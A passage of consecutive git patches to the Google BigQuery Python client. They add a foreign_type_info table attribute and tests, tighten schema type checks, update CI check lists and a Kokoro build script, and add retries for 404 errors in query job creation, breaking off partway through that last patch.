2001 From: Chalmer Lowe Date: Fri, 21 Feb 2025 12:45:15 -0500 Subject: [PATCH 065/202] Feat: Adds foreign_type_info attribute to table class and adds unit tests. 
(#2126) * adds foreign_type_info attribute to table * feat: Adds foreign_type_info attribute and tests * updates docstrings for foreign_type_info * Updates property handling, especially as regards set/get_sub_prop * Removes extraneous comments and debug expressions * Refactors build_resource_from_properties w get/set_sub_prop * updates to foreign_type_info, tests and wiring * Adds logic to detect non-Sequence schema.fields value * updates assorted tests and logic --- google/cloud/bigquery/_helpers.py | 4 +- google/cloud/bigquery/schema.py | 57 ++++++---- google/cloud/bigquery/table.py | 75 +++++++++++- tests/unit/job/test_load.py | 2 +- tests/unit/test_client.py | 8 +- tests/unit/test_schema.py | 183 +++++++++++++++++++----------- tests/unit/test_table.py | 173 +++++++++++++++++++++++++++- 7 files changed, 398 insertions(+), 104 deletions(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index ea47af28d..d40217c4d 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -978,11 +978,11 @@ def _build_resource_from_properties(obj, filter_fields): """ partial = {} for filter_field in filter_fields: - api_field = obj._PROPERTY_TO_API_FIELD.get(filter_field) + api_field = _get_sub_prop(obj._PROPERTY_TO_API_FIELD, filter_field) if api_field is None and filter_field not in obj._properties: raise ValueError("No property %s" % filter_field) elif api_field is not None: - partial[api_field] = obj._properties.get(api_field) + _set_sub_prop(partial, api_field, _get_sub_prop(obj._properties, api_field)) else: # allows properties that are not defined in the library # and properties that have the same name as API resource key diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 0f011a275..03cde830e 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -15,10 +15,9 @@ """Schemas for BigQuery tables / queries.""" from __future__ import annotations 
-import collections import enum import typing -from typing import Any, cast, Dict, Iterable, Optional, Union +from typing import Any, cast, Dict, Iterable, Optional, Union, Sequence from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql @@ -489,6 +488,8 @@ def _parse_schema_resource(info): Optional[Sequence[google.cloud.bigquery.schema.SchemaField`]: A list of parsed fields, or ``None`` if no "fields" key found. """ + if isinstance(info, list): + return [SchemaField.from_api_repr(f) for f in info] return [SchemaField.from_api_repr(f) for f in info.get("fields", ())] @@ -501,40 +502,46 @@ def _build_schema_resource(fields): Returns: Sequence[Dict]: Mappings describing the schema of the supplied fields. """ - return [field.to_api_repr() for field in fields] + if isinstance(fields, Sequence): + # Input is a Sequence (e.g. a list): Process and return a list of API resource mappings + return [field.to_api_repr() for field in fields] + + else: + raise TypeError("Schema must be a Sequence (e.g. a list) or None.") def _to_schema_fields(schema): - """Coerce `schema` to a list of schema field instances. + """Coerces schema to a list of SchemaField instances while + preserving the original structure as much as possible. Args: - schema(Sequence[Union[ \ - :class:`~google.cloud.bigquery.schema.SchemaField`, \ - Mapping[str, Any] \ - ]]): - Table schema to convert. If some items are passed as mappings, - their content must be compatible with - :meth:`~google.cloud.bigquery.schema.SchemaField.from_api_repr`. + schema (Sequence[Union[ \ + :class:`~google.cloud.bigquery.schema.SchemaField`, \ + Mapping[str, Any] \ + ] + ] + ): + Table schema to convert. Can be a list of SchemaField + objects or mappings. Returns: - Sequence[:class:`~google.cloud.bigquery.schema.SchemaField`] + A list of SchemaField objects. 
Raises: - Exception: If ``schema`` is not a sequence, or if any item in the - sequence is not a :class:`~google.cloud.bigquery.schema.SchemaField` - instance or a compatible mapping representation of the field. + TypeError: If schema is not a Sequence. """ - for field in schema: - if not isinstance(field, (SchemaField, collections.abc.Mapping)): - raise ValueError( - "Schema items must either be fields or compatible " - "mapping representations." - ) - return [ - field if isinstance(field, SchemaField) else SchemaField.from_api_repr(field) - for field in schema - ] + if isinstance(schema, Sequence): + # Input is a Sequence (e.g. a list): Process and return a list of SchemaFields + return [ + field + if isinstance(field, SchemaField) + else SchemaField.from_api_repr(field) + for field in schema + ] + + else: + raise TypeError("Schema must be a Sequence (e.g. a list) or None.") class PolicyTagList(object): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 934a28cfc..c70a0ebea 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -21,7 +21,8 @@ import functools import operator import typing -from typing import Any, Dict, Iterable, Iterator, List, Optional, Tuple, Union +from typing import Any, Dict, Iterable, Iterator, List, Optional, Tuple, Union, Sequence + import warnings try: @@ -66,6 +67,7 @@ from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration from google.cloud.bigquery.enums import DefaultPandasDTypes from google.cloud.bigquery.external_config import ExternalConfig +from google.cloud.bigquery import schema as _schema from google.cloud.bigquery.schema import _build_schema_resource from google.cloud.bigquery.schema import _parse_schema_resource from google.cloud.bigquery.schema import _to_schema_fields @@ -398,7 +400,7 @@ class Table(_TableBase): "partitioning_type": "timePartitioning", "range_partitioning": "rangePartitioning", "time_partitioning": "timePartitioning", - 
"schema": "schema", + "schema": ["schema", "fields"], "snapshot_definition": "snapshotDefinition", "clone_definition": "cloneDefinition", "streaming_buffer": "streamingBuffer", @@ -411,6 +413,7 @@ class Table(_TableBase): "max_staleness": "maxStaleness", "resource_tags": "resourceTags", "external_catalog_table_options": "externalCatalogTableOptions", + "foreign_type_info": ["schema", "foreignTypeInfo"], } def __init__(self, table_ref, schema=None) -> None: @@ -451,8 +454,20 @@ def schema(self): If ``schema`` is not a sequence, or if any item in the sequence is not a :class:`~google.cloud.bigquery.schema.SchemaField` instance or a compatible mapping representation of the field. + + .. Note:: + If you are referencing a schema for an external catalog table such + as a Hive table, it will also be necessary to populate the foreign_type_info + attribute. This is not necessary if defining the schema for a BigQuery table. + + For details, see: + https://cloud.google.com/bigquery/docs/external-tables + https://cloud.google.com/bigquery/docs/datasets-intro#external_datasets + """ - prop = self._properties.get(self._PROPERTY_TO_API_FIELD["schema"]) + prop = _helpers._get_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["schema"] + ) if not prop: return [] else: @@ -463,10 +478,21 @@ def schema(self, value): api_field = self._PROPERTY_TO_API_FIELD["schema"] if value is None: - self._properties[api_field] = None - else: + _helpers._set_sub_prop( + self._properties, + api_field, + None, + ) + elif isinstance(value, Sequence): value = _to_schema_fields(value) - self._properties[api_field] = {"fields": _build_schema_resource(value)} + value = _build_schema_resource(value) + _helpers._set_sub_prop( + self._properties, + api_field, + value, + ) + else: + raise TypeError("Schema must be a Sequence (e.g. 
a list) or None.") @property def labels(self): @@ -1075,6 +1101,43 @@ def external_catalog_table_options( self._PROPERTY_TO_API_FIELD["external_catalog_table_options"] ] = value + @property + def foreign_type_info(self) -> Optional[_schema.ForeignTypeInfo]: + """Optional. Specifies metadata of the foreign data type definition in + field schema (TableFieldSchema.foreign_type_definition). + + Returns: + Optional[schema.ForeignTypeInfo]: + Foreign type information, or :data:`None` if not set. + + .. Note:: + foreign_type_info is only required if you are referencing an + external catalog such as a Hive table. + For details, see: + https://cloud.google.com/bigquery/docs/external-tables + https://cloud.google.com/bigquery/docs/datasets-intro#external_datasets + """ + + prop = _helpers._get_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["foreign_type_info"] + ) + if prop is not None: + return _schema.ForeignTypeInfo.from_api_repr(prop) + return None + + @foreign_type_info.setter + def foreign_type_info(self, value: Union[_schema.ForeignTypeInfo, dict, None]): + value = _helpers._isinstance_or_raise( + value, + (_schema.ForeignTypeInfo, dict), + none_allowed=True, + ) + if isinstance(value, _schema.ForeignTypeInfo): + value = value.to_api_repr() + _helpers._set_sub_prop( + self._properties, self._PROPERTY_TO_API_FIELD["foreign_type_info"], value + ) + @classmethod def from_string(cls, full_table_id: str) -> "Table": """Construct a table from fully-qualified table ID. 
diff --git a/tests/unit/job/test_load.py b/tests/unit/job/test_load.py index 0fb044696..10df46fb3 100644 --- a/tests/unit/job/test_load.py +++ b/tests/unit/job/test_load.py @@ -272,7 +272,7 @@ def test_schema_setter_invalid_field(self): config = LoadJobConfig() full_name = SchemaField("full_name", "STRING", mode="REQUIRED") - with self.assertRaises(ValueError): + with self.assertRaises(TypeError): config.schema = [full_name, object()] def test_schema_setter(self): diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index a5af37b6b..6897c2552 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2051,7 +2051,7 @@ def test_update_dataset(self): ds.labels = LABELS ds.access_entries = [AccessEntry("OWNER", "userByEmail", "phred@example.com")] ds.resource_tags = RESOURCE_TAGS - fields = [ + filter_fields = [ "description", "friendly_name", "location", @@ -2065,12 +2065,12 @@ def test_update_dataset(self): ) as final_attributes: ds2 = client.update_dataset( ds, - fields=fields, + fields=filter_fields, timeout=7.5, ) final_attributes.assert_called_once_with( - {"path": "/%s" % PATH, "fields": fields}, client, None + {"path": "/%s" % PATH, "fields": filter_fields}, client, None ) conn.api_request.assert_called_once_with( @@ -2615,7 +2615,7 @@ def test_update_table_w_schema_None(self): self.assertEqual(len(conn.api_request.call_args_list), 2) req = conn.api_request.call_args_list[1] self.assertEqual(req[1]["method"], "PATCH") - sent = {"schema": None} + sent = {"schema": {"fields": None}} self.assertEqual(req[1]["data"], sent) self.assertEqual(req[1]["path"], "/%s" % path) self.assertEqual(len(updated_table.schema), 0) diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 467f1e1de..3f2304a70 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -765,27 +765,62 @@ def test__parse_schema_resource_fields_without_mode(self): self._verifySchema(schema, RESOURCE) -class 
Test_build_schema_resource(unittest.TestCase, _SchemaBase): +class Test_build_schema_resource: + """Tests for the _build_schema_resource function.""" + def _call_fut(self, resource): - from google.cloud.bigquery.schema import _build_schema_resource + return schema._build_schema_resource(resource) + + FULL_NAME = schema.SchemaField( + name="full_name", field_type="STRING", mode="REQUIRED" + ) + AGE = schema.SchemaField(name="age", field_type="INTEGER", mode="REQUIRED") + LIST_RESOURCE = [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ] + FOREIGN_TYPE_INFO = schema.ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED") + FOREIGN_TYPE_INFO_RESOURCE = {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"} + + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param([], [], id="empty list"), + pytest.param([FULL_NAME, AGE], LIST_RESOURCE, id="list"), + ], + ) + def test_ctor_valid_input(self, schema, expected): + result = self._call_fut(schema) + + assert result == expected - return _build_schema_resource(resource) + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param(123, TypeError, id="invalid type"), + ], + ) + def test_ctor_invalid_input(self, schema, expected): + with pytest.raises(TypeError) as e: + self._call_fut(schema) + + # Looking for the first phrase from the string "Schema must be a ..." 
+ assert "Schema must be a " in str(e.value) def test_defaults(self): from google.cloud.bigquery.schema import SchemaField full_name = SchemaField("full_name", "STRING", mode="REQUIRED") age = SchemaField("age", "INTEGER", mode="REQUIRED") + # test with simple list resource = self._call_fut([full_name, age]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - ) - self.assertEqual( - resource[1], - {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + } + assert resource[1] == {"name": "age", "type": "INTEGER", "mode": "REQUIRED"} def test_w_description(self): from google.cloud.bigquery.schema import SchemaField @@ -802,25 +837,20 @@ def test_w_description(self): description=None, ) resource = self._call_fut([full_name, age]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - { - "name": "full_name", - "type": "STRING", - "mode": "REQUIRED", - "description": DESCRIPTION, - }, - ) - self.assertEqual( - resource[1], - { - "name": "age", - "type": "INTEGER", - "mode": "REQUIRED", - "description": None, - }, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "description": DESCRIPTION, + } + + assert resource[1] == { + "name": "age", + "type": "INTEGER", + "mode": "REQUIRED", + "description": None, + } def test_w_subfields(self): from google.cloud.bigquery.schema import SchemaField @@ -832,49 +862,72 @@ def test_w_subfields(self): "phone", "RECORD", mode="REPEATED", fields=[ph_type, ph_num] ) resource = self._call_fut([full_name, phone]) - self.assertEqual(len(resource), 2) - self.assertEqual( - resource[0], - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - ) - self.assertEqual( - resource[1], - { - "name": "phone", - "type": "RECORD", - "mode": 
"REPEATED", - "fields": [ - {"name": "type", "type": "STRING", "mode": "REQUIRED"}, - {"name": "number", "type": "STRING", "mode": "REQUIRED"}, - ], - }, - ) + assert len(resource) == 2 + assert resource[0] == { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + } + assert resource[1] == { + "name": "phone", + "type": "RECORD", + "mode": "REPEATED", + "fields": [ + {"name": "type", "type": "STRING", "mode": "REQUIRED"}, + {"name": "number", "type": "STRING", "mode": "REQUIRED"}, + ], + } + +class Test_to_schema_fields: + """Tests for the _to_schema_fields function.""" -class Test_to_schema_fields(unittest.TestCase): @staticmethod def _call_fut(schema): from google.cloud.bigquery.schema import _to_schema_fields return _to_schema_fields(schema) - def test_invalid_type(self): - schema = [ - ("full_name", "STRING", "REQUIRED"), - ("address", "STRING", "REQUIRED"), - ] - with self.assertRaises(ValueError): - self._call_fut(schema) - - def test_schema_fields_sequence(self): - from google.cloud.bigquery.schema import SchemaField + FULL_NAME = schema.SchemaField( + name="full_name", field_type="STRING", mode="REQUIRED" + ) + AGE = schema.SchemaField(name="age", field_type="INTEGER", mode="REQUIRED") + LIST_RESOURCE = [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ] + FOREIGN_TYPE_INFO = schema.ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED") + FOREIGN_TYPE_INFO_RESOURCE = {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"} - schema = [ - SchemaField("full_name", "STRING", mode="REQUIRED"), - SchemaField("age", "INT64", mode="NULLABLE"), - ] + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param([], [], id="empty list"), + pytest.param((), [], id="empty tuple"), + pytest.param(LIST_RESOURCE, [FULL_NAME, AGE], id="list"), + ], + ) + def test_ctor_valid_input(self, schema, expected): result = self._call_fut(schema) - self.assertEqual(result, schema) + + assert result == 
expected + + @pytest.mark.parametrize( + "schema,expected", + [ + pytest.param(123, TypeError, id="invalid schema type"), + pytest.param([123, 123], TypeError, id="invalid SchemaField type"), + pytest.param({"fields": 123}, TypeError, id="invalid type, dict"), + pytest.param( + {"fields": 123, "foreignTypeInfo": 123}, + TypeError, + id="invalid type, dict", + ), + ], + ) + def test_ctor_invalid_input(self, schema, expected): + with pytest.raises(expected): + self._call_fut(schema) def test_unknown_properties(self): schema = [ @@ -933,7 +986,7 @@ def test_valid_mapping_representation(self): ] result = self._call_fut(schema) - self.assertEqual(result, expected_schema) + assert result == expected_schema class TestPolicyTags(unittest.TestCase): diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 5154f01d8..1a3d7ec0f 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -31,6 +31,7 @@ from google.cloud.bigquery import _versions_helpers from google.cloud.bigquery import exceptions from google.cloud.bigquery import external_config +from google.cloud.bigquery import schema from google.cloud.bigquery.table import TableReference from google.cloud.bigquery.dataset import DatasetReference @@ -699,7 +700,7 @@ def test_schema_setter_invalid_field(self): table_ref = dataset.table(self.TABLE_NAME) table = self._make_one(table_ref) full_name = SchemaField("full_name", "STRING", mode="REQUIRED") - with self.assertRaises(ValueError): + with self.assertRaises(TypeError): table.schema = [full_name, object()] def test_schema_setter_valid_fields(self): @@ -1213,6 +1214,83 @@ def test_to_api_repr_w_unsetting_expiration(self): } self.assertEqual(resource, exp_resource) + def test_to_api_repr_w_schema_and_foreign_type_info(self): + """Tests to ensure that to_api_repr works correctly with + both schema and foreign_type_info fields + """ + + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + FOREIGNTYPEINFO = { + 
"typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + SCHEMA = { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreignTypeInfo": FOREIGNTYPEINFO, + } + + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": SCHEMA, + } + + table = self._get_target_class().from_api_repr(API_REPR) + assert table._properties == table.to_api_repr() + + # update schema (i.e. the fields), ensure foreign_type_info is unchanged + table.schema = [] + expected = { + "fields": [], + "foreignTypeInfo": {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}, + } + assert table.to_api_repr()["schema"] == expected + + # update foreign_type_info, ensure schema (i.e. the fields), is unchanged + table.foreign_type_info = {"typeSystem": "SCHEMA_SHOULD_NOT_CHANGE"} + expected = { + "fields": [], + "foreignTypeInfo": {"typeSystem": "SCHEMA_SHOULD_NOT_CHANGE"}, + } + assert table.to_api_repr()["schema"] == expected + + def test_from_api_repr_w_schema_and_foreign_type_info(self): + """Tests to ensure that from_api_repr works correctly with + both schema and foreign_type_info fields + """ + + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + FOREIGNTYPEINFO = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + SCHEMA = { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreignTypeInfo": FOREIGNTYPEINFO, + } + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": SCHEMA, + } + + table = self._get_target_class().from_api_repr(API_REPR) + assert table._properties == API_REPR + def test__build_resource_w_custom_field(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -5993,6 +6071,99 @@ def 
test_external_catalog_table_options_from_api_repr(self): assert result == expected +class TestForeignTypeInfo: + PROJECT = "test-project" + DATASET_ID = "test_dataset" + TABLE_ID = "coffee_table" + DATASET = DatasetReference(PROJECT, DATASET_ID) + TABLEREF = DATASET.table(TABLE_ID) + FOREIGNTYPEINFO = { + "typeSystem": "TYPE_SYSTEM_UNSPECIFIED", + } + API_REPR = { + "tableReference": { + "projectId": PROJECT, + "datasetId": DATASET_ID, + "tableId": TABLE_ID, + }, + "schema": { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INTEGER", "mode": "REQUIRED"}, + ], + "foreign_info_type": FOREIGNTYPEINFO, + }, + } + + from google.cloud.bigquery.schema import ForeignTypeInfo + + @staticmethod + def _get_target_class(self): + from google.cloud.bigquery.table import Table + + return Table + + def _make_one(self, *args, **kw): + return self._get_target_class(self)(*args, **kw) + + def test_foreign_type_info_default_initialization(self): + table = self._make_one(self.TABLEREF) + assert table.foreign_type_info is None + + @pytest.mark.parametrize( + "foreign_type_info, expected", + [ + ( + {"typeSystem": "TYPE_SYSTEM_UNSPECIFIED"}, + "TYPE_SYSTEM_UNSPECIFIED", + ), + (None, None), + ( + ForeignTypeInfo(type_system="TYPE_SYSTEM_UNSPECIFIED"), + "TYPE_SYSTEM_UNSPECIFIED", + ), + ], + ) + def test_foreign_type_info_valid_inputs(self, foreign_type_info, expected): + table = self._make_one(self.TABLEREF) + + table.foreign_type_info = foreign_type_info + + if foreign_type_info is None: + result = table.foreign_type_info + else: + result = table.foreign_type_info.type_system + assert result == expected + + def test_foreign_type_info_invalid_inputs(self): + table = self._make_one(self.TABLEREF) + + # invalid on the whole + with pytest.raises(TypeError, match="Pass .*"): + table.foreign_type_info = 123 + + def test_foreign_type_info_to_api_repr(self): + table = self._make_one(self.TABLEREF) + + table.foreign_type_info = 
self.ForeignTypeInfo( + type_system="TYPE_SYSTEM_UNSPECIFIED", + ) + + result = table.to_api_repr()["schema"]["foreignTypeInfo"] + expected = self.FOREIGNTYPEINFO + assert result == expected + + def test_foreign_type_info_from_api_repr(self): + table = self._make_one(self.TABLEREF) + table.foreign_type_info = self.FOREIGNTYPEINFO + + fti = schema.ForeignTypeInfo.from_api_repr(self.FOREIGNTYPEINFO) + + result = fti.to_api_repr() + expected = self.FOREIGNTYPEINFO + assert result == expected + + @pytest.mark.parametrize( "table_path", ( From fea49ffbf8aa1d53451864ceb7fd73189b6661cb Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 21 Feb 2025 14:16:20 -0500 Subject: [PATCH 066/202] deps: updates required checks list in github (#2136) * deps: updates required checks list in github * deps: updates snippet and system checks in github to remove 3.9 * changes the order of two items in the list. --- .github/sync-repo-settings.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml index 6543d5285..188c44bbd 100644 --- a/.github/sync-repo-settings.yaml +++ b/.github/sync-repo-settings.yaml @@ -10,14 +10,10 @@ branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro snippets-3.8' - - 'Kokoro snippets-3.12' - - 'Kokoro system-3.8' - 'Kokoro system-3.12' + - 'Kokoro snippets-3.12' - 'cla/google' - 'Samples - Lint' - - 'Samples - Python 3.7' - - 'Samples - Python 3.8' - 'Samples - Python 3.9' - 'Samples - Python 3.10' - 'Samples - Python 3.11' @@ -28,8 +24,7 @@ branchProtectionRules: requiresStrictStatusChecks: true requiredStatusCheckContexts: - 'Kokoro' - - 'Kokoro snippets-3.8' - 'cla/google' - 'Samples - Lint' - - 'Samples - Python 3.7' - - 'Samples - Python 3.8' + - 'Samples - Python 3.9' + - 'Samples - Python 3.10' From de10185c5faab6e9c6f12a6423be09ffb83c4ff6 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" 
<78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 25 Feb 2025 11:04:23 -0800 Subject: [PATCH 067/202] chore(python): conditionally load credentials in .kokoro/build.sh (#2137) Source-Link: https://github.com/googleapis/synthtool/commit/aa69fb74717c8f4c58c60f8cc101d3f4b2c07b09 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/build.sh | 20 ++++++++++++++------ 2 files changed, 16 insertions(+), 8 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 4c0027ff1..3f7634f25 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:04c35dc5f49f0f503a306397d6d043685f8d2bb822ab515818c4208d7fb2db3a -# created: 2025-01-16T15:24:11.364245182Z + digest: sha256:f016446d6e520e5fb552c45b110cba3f217bffdd3d06bdddd076e9e6d13266cf +# created: 2025-02-21T19:32:52.01306189Z diff --git a/.kokoro/build.sh b/.kokoro/build.sh index e4da2e2a7..d41b45aa1 100755 --- a/.kokoro/build.sh +++ b/.kokoro/build.sh @@ -15,11 +15,13 @@ set -eo pipefail +CURRENT_DIR=$(dirname "${BASH_SOURCE[0]}") + if [[ -z "${PROJECT_ROOT:-}" ]]; then - PROJECT_ROOT="github/python-bigquery" + PROJECT_ROOT=$(realpath "${CURRENT_DIR}/..") fi -cd "${PROJECT_ROOT}" +pushd "${PROJECT_ROOT}" # Disable buffering, so that the logs stream through. export PYTHONUNBUFFERED=1 @@ -28,10 +30,16 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Setup service account credentials. -export GOOGLE_APPLICATION_CREDENTIALS=${KOKORO_GFILE_DIR}/service-account.json +if [[ -f "${KOKORO_GFILE_DIR}/service-account.json" ]] +then + export GOOGLE_APPLICATION_CREDENTIALS=${KOKORO_GFILE_DIR}/service-account.json +fi # Setup project id. 
-export PROJECT_ID=$(cat "${KOKORO_GFILE_DIR}/project-id.json") +if [[ -f "${KOKORO_GFILE_DIR}/project-id.json" ]] +then + export PROJECT_ID=$(cat "${KOKORO_GFILE_DIR}/project-id.json") +fi # If this is a continuous build, send the test log to the FlakyBot. # See https://github.com/googleapis/repo-automation-bots/tree/main/packages/flakybot. @@ -46,7 +54,7 @@ fi # If NOX_SESSION is set, it only runs the specified session, # otherwise run all the sessions. if [[ -n "${NOX_SESSION:-}" ]]; then - python3 -m nox -s ${NOX_SESSION:-} + python3 -m nox -s ${NOX_SESSION:-} else - python3 -m nox + python3 -m nox fi From c6d5f8aaec21ab8f17436407aded4bc2316323fd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Tue, 25 Feb 2025 20:24:36 -0600 Subject: [PATCH 068/202] fix: retry 404 errors in `Client.query(...)` (#2135) * fix: retry 404 errors in `Client.query(...)` * retry on 404 * only retry notfound on jobs.insert * try to improve code coverage * disambiguate job not found from dataset/table not found * remove use of private attributes * fix unit tests * fix cover for retry.py --- google/cloud/bigquery/_job_helpers.py | 27 +++- google/cloud/bigquery/retry.py | 54 ++++++++ tests/unit/test_client.py | 174 +++++++++++++++++++++++++- 3 files changed, 252 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index e66ab2763..b028cd357 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -47,6 +47,7 @@ from google.cloud.bigquery import job import google.cloud.bigquery.query from google.cloud.bigquery import table +import google.cloud.bigquery.retry from google.cloud.bigquery.retry import POLLING_DEFAULT_VALUE # Avoid circular imports @@ -142,12 +143,28 @@ def do_query(): raise create_exc try: + # Sometimes we get a 404 after a Conflict. 
In this case, we + # have pretty high confidence that by retrying the 404, we'll + # (hopefully) eventually recover the job. + # https://github.com/googleapis/python-bigquery/issues/2134 + # + # Allow users who want to completely disable retries to + # continue to do so by setting retry to None. + get_job_retry = retry + if retry is not None: + # TODO(tswast): Amend the user's retry object with allowing + # 404 to retry when there's a public way to do so. + # https://github.com/googleapis/python-api-core/issues/796 + get_job_retry = ( + google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY + ) + query_job = client.get_job( job_id, project=project, location=location, - retry=retry, - timeout=timeout, + retry=get_job_retry, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, ) except core_exceptions.GoogleAPIError: # (includes RetryError) raise @@ -156,7 +173,13 @@ def do_query(): else: return query_job + # Allow users who want to completely disable retries to + # continue to do so by setting job_retry to None. + if job_retry is not None: + do_query = google.cloud.bigquery.retry._DEFAULT_QUERY_JOB_INSERT_RETRY(do_query) + future = do_query() + # The future might be in a failed state now, but if it's # unrecoverable, we'll find out when we ask for it's result, at which # point, we may retry. diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 10958980d..999d0e851 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -82,6 +82,32 @@ def _should_retry(exc): pass ``retry=bigquery.DEFAULT_RETRY.with_deadline(30)``. """ + +def _should_retry_get_job_conflict(exc): + """Predicate for determining when to retry a jobs.get call after a conflict error. + + Sometimes we get a 404 after a Conflict. In this case, we + have pretty high confidence that by retrying the 404, we'll + (hopefully) eventually recover the job. 
+ https://github.com/googleapis/python-bigquery/issues/2134 + + Note: we may be able to extend this to user-specified predicates + after https://github.com/googleapis/python-api-core/issues/796 + to tweak existing Retry object predicates. + """ + return isinstance(exc, exceptions.NotFound) or _should_retry(exc) + + +# Pick a deadline smaller than our other deadlines since we want to timeout +# before those expire. +_DEFAULT_GET_JOB_CONFLICT_DEADLINE = _DEFAULT_RETRY_DEADLINE / 3.0 +_DEFAULT_GET_JOB_CONFLICT_RETRY = retry.Retry( + predicate=_should_retry_get_job_conflict, + deadline=_DEFAULT_GET_JOB_CONFLICT_DEADLINE, +) +"""Private, may be removed in future.""" + + # Note: Take care when updating DEFAULT_TIMEOUT to anything but None. We # briefly had a default timeout, but even setting it at more than twice the # theoretical server-side default timeout of 2 minutes was not enough for @@ -142,6 +168,34 @@ def _job_should_retry(exc): The default job retry object. """ + +def _query_job_insert_should_retry(exc): + # Per https://github.com/googleapis/python-bigquery/issues/2134, sometimes + # we get a 404 error. In this case, if we get this far, assume that the job + # doesn't actually exist and try again. We can't add 404 to the default + # job_retry because that happens for errors like "this table does not + # exist", which probably won't resolve with a retry. + if isinstance(exc, exceptions.RetryError): + exc = exc.cause + + if isinstance(exc, exceptions.NotFound): + message = exc.message + # Don't try to retry table/dataset not found, just job not found. + # The URL contains jobs, so use whitespace to disambiguate. + return message is not None and " job" in message.lower() + + return _job_should_retry(exc) + + +_DEFAULT_QUERY_JOB_INSERT_RETRY = retry.Retry( + predicate=_query_job_insert_should_retry, + # jobs.insert doesn't wait for the job to complete, so we don't need the + # long _DEFAULT_JOB_DEADLINE for this part. 
